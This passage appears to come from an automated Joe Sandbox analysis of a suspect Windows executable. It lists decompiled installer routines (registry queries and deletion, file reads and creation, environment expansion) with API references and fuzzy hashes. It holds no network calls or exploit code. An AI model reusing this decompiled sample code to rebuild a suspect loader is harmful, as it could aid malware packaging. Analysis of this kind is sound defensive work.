                                  					return _t24;
                                  				}
                                  				return _t20;
                                  			}








                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(80000002,00405CC4,00000000,00000002,?,00000002,0017CE51,?,00405CC4,80000002,Software\Microsoft\Windows\CurrentVersion,0017CE51,Call,005ABA29), ref: 00405AA8
                                  • RegQueryValueExA.KERNELBASE(0017CE51,?,00000000,00405CC4,0017CE51,00405CC4), ref: 00405AC9
                                  • RegCloseKey.KERNELBASE(?), ref: 00405AEA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 3677997916-0
                                  • Opcode ID: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                  • Instruction ID: 71ae70624bec2c47f0bbb1bb8334a3f1983087d908a17f43c3698e5adb36173d
                                  • Opcode Fuzzy Hash: a7dc294ab98d1aedf48ab84cf89b8b0d9a3be53888eb2216a8b2e534b80ab0d4
                                  • Instruction Fuzzy Hash: 4E01487114020AEFDF128F64EC88AEB3FACEF14358F004126F906A6220D235D964DFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E00402438(int* __ebx, char* __esi) {
                                  				void* _t7;
                                  				int _t8;
                                  				long _t11;
                                  				int* _t14;
                                  				void* _t18;
                                  				char* _t20;
                                  				void* _t22;
                                  				void* _t25;
                                  
                                  				_t20 = __esi;
                                  				_t14 = __ebx;
                                  				_t7 = E00402B11(_t25, 0x20019); // executed
                                  				_t18 = _t7;
                                  				_t8 = E004029EA(3);
                                  				 *__esi = __ebx;
                                  				if(_t18 == __ebx) {
                                  					L7:
                                  					 *((intOrPtr*)(_t22 - 4)) = 1;
                                  				} else {
                                  					 *(_t22 + 8) = 0x3ff;
                                  					if( *((intOrPtr*)(_t22 - 0x14)) == __ebx) {
                                  						_t11 = RegEnumValueA(_t18, _t8, __esi, _t22 + 8, __ebx, __ebx, __ebx, __ebx);
                                  						__eflags = _t11;
                                  						if(_t11 != 0) {
                                  							goto L7;
                                  						} else {
                                  							goto L4;
                                  						}
                                  					} else {
                                  						RegEnumKeyA(_t18, _t8, __esi, 0x3ff);
                                  						L4:
                                  						_t20[0x3ff] = _t14;
                                  						_push(_t18);
                                  						RegCloseKey();
                                  					}
                                  				}
                                  				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t22 - 4));
                                  				return 0;
                                  			}












                                  APIs
                                    • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B39
                                  • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402466
                                  • RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 00402479
                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsuD883.tmp,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 0040248E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Enum$CloseOpenValue
                                  • String ID:
                                  • API String ID: 167947723-0
                                  • Opcode ID: 4e936370a045a5093ba77e57e34387299b70895795c41cc5222d621ec4f5c703
                                  • Instruction ID: e1b674d6fa50b79099c3a4ad1b77673b9663613076e8f513ce388d427edaab02
                                  • Opcode Fuzzy Hash: 4e936370a045a5093ba77e57e34387299b70895795c41cc5222d621ec4f5c703
                                  • Instruction Fuzzy Hash: 1FF0FF72A04204EFEB119F699E8CEBF7A6CEF40348F10483FF005B61C0D6B95E41962A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 16%
                                  			E1000279C(void* __ecx, intOrPtr _a4) {
                                  				signed int _v8;
                                  				void* _t31;
                                  				void* _t32;
                                  				int _t36;
                                  				void* _t40;
                                  				void* _t49;
                                  				void* _t54;
                                  				void* _t58;
                                  				signed int _t65;
                                  				void* _t70;
                                  				void* _t79;
                                  				intOrPtr _t81;
                                  				signed int _t88;
                                  				intOrPtr _t90;
                                  				intOrPtr _t91;
                                  				void* _t92;
                                  				void* _t94;
                                  				void* _t100;
                                  				void* _t101;
                                  				void* _t102;
                                  				void* _t103;
                                  				intOrPtr _t106;
                                  				intOrPtr _t107;
                                  
                                  				if( *0x10004040 != 0 && E1000271E(_a4) == 0) {
                                  					 *0x10004044 = _t106;
                                  					if( *0x1000403c != 0) {
                                  						_t106 =  *0x1000403c;
                                  					} else {
                                  						E10002CE0(E10002718(), __ecx);
                                  						 *0x1000403c = _t106;
                                  					}
                                  				}
                                  				_t31 = E1000275A(_a4);
                                  				_t107 = _t106 + 4;
                                  				if(_t31 <= 0) {
                                  					L9:
                                  					_t32 = E1000274E();
                                  					_t81 = _a4;
                                  					_t90 =  *0x10004048;
                                  					 *((intOrPtr*)(_t32 + _t81)) = _t90;
                                  					 *0x10004048 = _t81;
                                  					E10002748();
                                  					_t36 = ReadFile(??, ??, ??, ??, ??); // executed
                                  					 *0x1000401c = _t36;
                                  					 *0x10004020 = _t90;
                                  					if( *0x10004040 != 0 && E1000271E( *0x10004048) == 0) {
                                  						 *0x1000403c = _t107;
                                  						_t107 =  *0x10004044;
                                  					}
                                  					_t91 =  *0x10004048;
                                  					_a4 = _t91;
                                  					 *0x10004048 =  *((intOrPtr*)(E1000274E() + _t91));
                                  					_t40 = E1000272C(_t91);
                                  					_pop(_t92);
                                  					if(_t40 != 0) {
                                  						_t49 = E1000275A(_t92);
                                  						if(_t49 > 0) {
                                  							_push(_t49);
                                  							_push(E10002765() + _a4 + _v8);
                                  							_push(E1000276F());
                                  							if( *0x10004040 <= 0 || E1000271E(_a4) != 0) {
                                  								_pop(_t101);
                                  								_pop(_t54);
                                  								if( *((intOrPtr*)(_t101 + _t54)) == 2) {
                                  								}
                                  								asm("loop 0xfffffff5");
                                  							} else {
                                  								_pop(_t102);
                                  								_pop(_t58);
                                  								 *0x1000403c =  *0x1000403c +  *(_t102 + _t58) * 4;
                                  								asm("loop 0xffffffeb");
                                  							}
                                  						}
                                  					}
                                  					if( *0x10004048 == 0) {
                                  						 *0x1000403c = 0;
                                  					}
                                  					_t94 = _a4 + E10002765();
                                  					 *(E10002773() + _t94) =  *0x1000401c;
                                  					 *((intOrPtr*)(E10002777() + _t94)) =  *0x10004020;
                                  					E10002787(_a4);
                                  					if(E1000273A() != 0) {
                                  						 *0x10004058 = GetLastError();
                                  					}
                                  					return _a4;
                                  				}
                                  				_push(E10002765() + _a4);
                                  				_t65 = E1000276B();
                                  				_v8 = _t65;
                                  				_t88 = _t31;
                                  				_push(_t77 + _t65 * _t88);
                                  				_t79 = E10002777();
                                  				_t100 = E10002773();
                                  				_t103 = E1000276F();
                                  				_t70 = _t88;
                                  				if( *((intOrPtr*)(_t103 + _t70)) == 2) {
                                  					_push( *((intOrPtr*)(_t79 + _t70)));
                                  				}
                                  				_push( *((intOrPtr*)(_t100 + _t70)));
                                  				asm("loop 0xfffffff1");
                                  				goto L9;
                                  			}

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.798233791.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                  • Associated: 00000000.00000002.798214888.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000000.00000002.798250041.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                  • Associated: 00000000.00000002.798280096.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10000000_SC.jbxd
                                  Similarity
                                  • API ID: ErrorFileLastRead
                                  • String ID:
                                  • API String ID: 1948546556-0
                                  • Opcode ID: ba7f390c09ff9bfcbf5680bad404fe2f4794605870cc1d857870def209431754
                                  • Instruction ID: bd365418521e43e453085722f926cc1c0e2ab3e4cffdaddced3e06c5c0338b71
                                  • Opcode Fuzzy Hash: ba7f390c09ff9bfcbf5680bad404fe2f4794605870cc1d857870def209431754
                                  • Instruction Fuzzy Hash: D951A5BA808215DFFB24DF64DCC675937A8EB443D4F22842AE608E722DDF34A950CB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00402517(intOrPtr __ebx, void* __edi, void* __esi) {
                                  				intOrPtr _t28;
                                  				void* _t37;
                                  				void* _t40;
                                  
                                  				 *((intOrPtr*)(_t37 - 0x30)) = __ebx;
                                  				_t28 = E004029EA(2);
                                  				_t40 = _t28 - 1;
                                  				 *((intOrPtr*)(_t37 - 0x34)) = _t28;
                                  				if(_t40 < 0) {
                                  					L25:
                                  					 *0x42ec28 =  *0x42ec28 +  *(_t37 - 4);
                                  				} else {
                                  					__ecx = 0x3ff;
                                  					if(__eax > 0x3ff) {
                                  						 *((intOrPtr*)(__ebp - 0x34)) = 0x3ff;
                                  					}
                                  					if( *__esi == __bl) {
                                  						L22:
                                  						__esi =  *((intOrPtr*)(__ebp - 0x30));
                                  						goto L23;
                                  					} else {
                                  						 *((char*)(__ebp + 0xb)) = __bl;
                                  						 *(__ebp - 8) = E00405B0F(__ecx, __esi);
                                  						if( *((intOrPtr*)(__ebp - 0x34)) <= __ebx) {
                                  							goto L22;
                                  						} else {
                                  							__esi =  *((intOrPtr*)(__ebp - 0x30));
                                  							while(1) {
                                  								__ebp - 0x2c = __ebp - 9;
                                  								__eax = ReadFile( *(__ebp - 8), __ebp - 9, 1, __ebp - 0x2c, __ebx); // executed
                                  								if(__eax == 0 ||  *(__ebp - 0x2c) != 1) {
                                  									break;
                                  								}
                                  								if( *((intOrPtr*)(__ebp - 0x18)) != __ebx) {
                                  									 *(__ebp - 9) & 0x000000ff = E00405AF6(__edi,  *(__ebp - 9) & 0x000000ff);
                                  								} else {
                                  									if( *((char*)(__ebp + 0xb)) == 0xd ||  *((char*)(__ebp + 0xb)) == 0xa) {
                                  										__al =  *(__ebp - 9);
                                  										if( *((intOrPtr*)(__ebp + 0xb)) == __al || __al != 0xd && __al != 0xa) {
                                  											__eax = SetFilePointer( *(__ebp - 8), 0xffffffff, __ebx, 1);
                                  										} else {
                                  											 *((char*)(__esi + __edi)) = __al;
                                  											__esi = __esi + 1;
                                  										}
                                  										break;
                                  									} else {
                                  										__al =  *(__ebp - 9);
                                  										 *((char*)(__esi + __edi)) = __al;
                                  										__esi = __esi + 1;
                                  										 *((char*)(__ebp + 0xb)) = __al;
                                  										if(__al == __bl) {
                                  											break;
                                  										} else {
                                  											if(__esi <  *((intOrPtr*)(__ebp - 0x34))) {
                                  												continue;
                                  											} else {
                                  												break;
                                  											}
                                  										}
                                  									}
                                  								}
                                  								goto L26;
                                  							}
                                  							L23:
                                  							 *((char*)(__esi + __edi)) = __bl;
                                  							if(_t40 == 0) {
                                  								 *(_t37 - 4) = 1;
                                  							}
                                  							goto L25;
                                  						}
                                  					}
                                  				}
                                  				L26:
                                  				return 0;
                                  			}

                                  APIs
                                  • ReadFile.KERNELBASE(?,?,00000001,?,?,?,00000002), ref: 00402563
                                    • Part of subcall function 00405AF6: wsprintfA.USER32 ref: 00405B03
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: FileReadwsprintf
                                  • String ID:
                                  • API String ID: 3326442220-0
                                  • Opcode ID: 65f80271cd79c5aa039eb1f58c142b472b49f515f6f0f39dbbd02c749ab5cc01
                                  • Instruction ID: 06e7f106e31df8bdef2bd810d63df5d3c97d0fbe38466024ce319a2e702c6f31
                                  • Opcode Fuzzy Hash: 65f80271cd79c5aa039eb1f58c142b472b49f515f6f0f39dbbd02c749ab5cc01
                                  • Instruction Fuzzy Hash: D521E1B1D05299FFDF219B948E686AEBB759B01304F14407BF481B62D2D6B88A81C72D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 84%
                                  			E004023C6(int* __ebx, char* __esi) {
                                  				void* _t17;
                                  				char* _t18;
                                  				void* _t33;
                                  				void* _t37;
                                  				void* _t40;
                                  
                                  				_t35 = __esi;
                                  				_t27 = __ebx;
                                  				_t17 = E00402B11(_t40, 0x20019); // executed
                                  				_t33 = _t17;
                                  				_t18 = E00402A07(0x33);
                                  				 *__esi = __ebx;
                                  				if(_t33 == __ebx) {
                                  					 *(_t37 - 4) = 1;
                                  				} else {
                                  					 *(_t37 - 0x2c) = 0x400;
                                  					if(RegQueryValueExA(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x2c) != 0) {
                                  						L7:
                                  						 *_t35 = _t27;
                                  						 *(_t37 - 4) = 1;
                                  					} else {
                                  						if( *(_t37 + 8) == 4) {
                                  							__eflags =  *(_t37 - 0x14) - __ebx;
                                  							 *(_t37 - 4) = 0 |  *(_t37 - 0x14) == __ebx;
                                  							E00405AF6(__esi,  *__esi);
                                  						} else {
                                  							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                  								 *(_t37 - 4) =  *(_t37 - 0x14);
                                  								_t35[0x3ff] = _t27;
                                  							} else {
                                  								goto L7;
                                  							}
                                  						}
                                  					}
                                  					_push(_t33);
                                  					RegCloseKey();
                                  				}
                                  				 *0x42ec28 =  *0x42ec28 +  *(_t37 - 4);
                                  				return 0;
                                  			}

                                  APIs
                                    • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B39
                                  • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004023F6
                                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsuD883.tmp,00000000,?,?,?,00000100,?,?,?,00000011,00000002), ref: 0040248E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID:
                                  • API String ID: 3677997916-0
                                  • Opcode ID: ee9e458ceb1ad02052770f1157f21e839e5b4edcc6ae75105c93fe669e782df6
                                  • Instruction ID: 229bf70010f867cab42174c5808720b5045325e5d967dec612ec992921af3bc6
                                  • Opcode Fuzzy Hash: ee9e458ceb1ad02052770f1157f21e839e5b4edcc6ae75105c93fe669e782df6
                                  • Instruction Fuzzy Hash: D911A331D05205EFDB15CFA4CA885AFBBB4AF04344F20843FE446B72C0D6B85A41DB2A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 60%
                                  			E00401389(signed int _a4) {
                                  				intOrPtr* _t6;
                                  				void* _t8;
                                  				void* _t10;
                                  				signed int _t11;
                                  				void* _t12;
                                  				intOrPtr _t15;
                                  				signed int _t16;
                                  				signed int _t17;
                                  				void* _t18;
                                  
                                  				_t17 = _a4;
                                  				while(_t17 >= 0) {
                                  					_t15 =  *0x42ebd0; // 0x5aa88c
                                  					_t6 = _t17 * 0x1c + _t15;
                                  					if( *_t6 == 1) {
                                  						break;
                                  					}
                                  					_push(_t6); // executed
                                  					_t8 = E00401434(); // executed
                                  					if(_t8 == 0x7fffffff) {
                                  						return 0x7fffffff;
                                  					}
                                  					_t10 = E0040136D(_t8);
                                  					if(_t10 != 0) {
                                  						_t11 = _t10 - 1;
                                  						_t16 = _t17;
                                  						_t17 = _t11;
                                  						_t12 = _t11 - _t16;
                                  					} else {
                                  						_t12 = _t10 + 1;
                                  						_t17 = _t17 + 1;
                                  					}
                                  					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                  						 *0x42e38c =  *0x42e38c + _t12;
                                  						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e38c, 0x7530,  *0x42e374), 0);
                                  					}
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                  • SendMessageA.USER32 ref: 004013F4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 6a14d1f73b45d8c574bbb08bd463b0fecddd08d442bdf50b9e33ff1249aac855
                                  • Instruction ID: 2f867942e182ee5f7aafd3a4eddd62757609932d8a5da55f1e4142973db533dc
                                  • Opcode Fuzzy Hash: 6a14d1f73b45d8c574bbb08bd463b0fecddd08d442bdf50b9e33ff1249aac855
                                  • Instruction Fuzzy Hash: 0F01F431B242109BE7298B399C04B6A36D8E710325F10863BF811F72F1D678DC039B4D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004022BE(void* __ebx) {
                                  				char* _t6;
                                  				long _t8;
                                  				void* _t15;
                                  				long _t19;
                                  				void* _t22;
                                  				void* _t23;
                                  
                                  				_t15 = __ebx;
                                  				_t26 =  *(_t23 - 0x14) - __ebx;
                                  				if( *(_t23 - 0x14) != __ebx) {
                                  					_t6 = E00402A07(0x22);
                                  					_t18 =  *(_t23 - 0x14) & 0x00000002;
                                  					__eflags =  *(_t23 - 0x14) & 0x00000002;
                                  					_t8 = E00402A47(E00402AFC( *((intOrPtr*)(_t23 - 0x20))), _t6, _t18); // executed
                                  					_t19 = _t8;
                                  					goto L4;
                                  				} else {
                                  					_t22 = E00402B11(_t26, 2);
                                  					if(_t22 == __ebx) {
                                  						L6:
                                  						 *((intOrPtr*)(_t23 - 4)) = 1;
                                  					} else {
                                  						_t19 = RegDeleteValueA(_t22, E00402A07(0x33));
                                  						RegCloseKey(_t22);
                                  						L4:
                                  						if(_t19 != _t15) {
                                  							goto L6;
                                  						}
                                  					}
                                  				}
                                  				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t23 - 4));
                                  				return 0;
                                  			}

                                  APIs
                                    • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B39
                                  • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 004022DD
                                  • RegCloseKey.ADVAPI32(00000000), ref: 004022E6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CloseDeleteOpenValue
                                  • String ID:
                                  • API String ID: 849931509-0
                                  • Opcode ID: c04a8f36ed96f6be7afbf45aede88929f47c8ed0e9b87cf67fe829169f25e1a4
                                  • Instruction ID: 0038f50324932004c091ce3bbea58ac29e0da352c26995222e1fcab20123e112
                                  • Opcode Fuzzy Hash: c04a8f36ed96f6be7afbf45aede88929f47c8ed0e9b87cf67fe829169f25e1a4
                                  • Instruction Fuzzy Hash: ABF0AF32A00110ABDB10BBF58E8EEAE62689B40318F10053BF501B71C1D9FD5D01966E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004019F1(char __ebx) {
                                  				CHAR* _t7;
                                  				long _t8;
                                  				char _t12;
                                  				CHAR* _t17;
                                  				void* _t19;
                                  
                                  				_t12 = __ebx;
                                  				_t7 = E00402A07(1);
                                  				 *(_t19 + 8) = _t7;
                                  				_t8 = ExpandEnvironmentStringsA(_t7, _t17, 0x400); // executed
                                  				if(_t8 == 0 ||  *((intOrPtr*)(_t19 - 0x1c)) != __ebx && lstrcmpA( *(_t19 + 8), _t17) == 0) {
                                  					 *((intOrPtr*)(_t19 - 4)) = 1;
                                  					 *_t17 = _t12;
                                  				}
                                  				_t17[0x3ff] = _t12;
                                  				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t19 - 4));
                                  				return 0;
                                  			}









                                  APIs
                                  • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A04
                                  • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A17
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: EnvironmentExpandStringslstrcmp
                                  • String ID:
                                  • API String ID: 1938659011-0
                                  • Opcode ID: f2bb0fb77bd637ba619c739f690f83387884a2b26abca135dc1c3c7e0cdf15c4
                                  • Instruction ID: afb86ebb905af139dc7494b608cce5e0607b26c706a03dcc942419ad1d9f91eb
                                  • Opcode Fuzzy Hash: f2bb0fb77bd637ba619c739f690f83387884a2b26abca135dc1c3c7e0cdf15c4
                                  • Instruction Fuzzy Hash: 95F02032F06240EBCB21CFAADD48AABBFE8DF51350B10403BE508F2290D6388501CB5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
                                  • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Window$EnableShow
                                  • String ID:
                                  • API String ID: 1136574915-0
                                  • Opcode ID: 2c8e27dbc072caeb4317b02db2b6e6eace6336ff82acc8787d8b55f2e388984e
                                  • Instruction ID: 1f6c93b120dc61c6d4456c8bda968d24c35af38667243ca5670bd8e00a7a4229
                                  • Opcode Fuzzy Hash: 2c8e27dbc072caeb4317b02db2b6e6eace6336ff82acc8787d8b55f2e388984e
                                  • Instruction Fuzzy Hash: 14E0C273B04110DBDB20BBF5AE4AA6E3364EF00369B100837F102F10D1D6B99C40866E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 68%
                                  			E00405846(CHAR* _a4, long _a8, long _a12) {
                                  				signed int _t5;
                                  				void* _t6;
                                  
                                  				_t5 = GetFileAttributesA(_a4); // executed
                                  				asm("sbb ecx, ecx");
                                  				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                  				return _t6;
                                  			}






                                  APIs
                                  • GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\SC.028UCCP.exe,80000000,00000003), ref: 0040584A
                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040586C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: File$AttributesCreate
                                  • String ID:
                                  • API String ID: 415043291-0
                                  • Opcode ID: 2ef177618df3c6e064d17c8612f07db8468e07c34dd9f446758cb9fc7f1f7b71
                                  • Instruction ID: d58f26a5a32defaeeb3d325f121af029a3aa60b04f4a5bd1c9a51958cab5ad8a
                                  • Opcode Fuzzy Hash: 2ef177618df3c6e064d17c8612f07db8468e07c34dd9f446758cb9fc7f1f7b71
                                  • Instruction Fuzzy Hash: B8D09E31658301AFEF098F20DE16F2EBBA2EB84B01F10962CB642940E0D6715C15DB16
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405821(CHAR* _a4) {
                                  				signed char _t3;
                                  				signed char _t7;
                                  
                                  				_t3 = GetFileAttributesA(_a4); // executed
                                  				_t7 = _t3;
                                  				if(_t7 != 0xffffffff) {
                                  					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                  				}
                                  				return _t7;
                                  			}






                                  APIs
                                  • GetFileAttributesA.KERNELBASE(?,?,00405439,?,?,00000000,0040561C,?,?,?,?), ref: 00405826
                                  • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040583A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
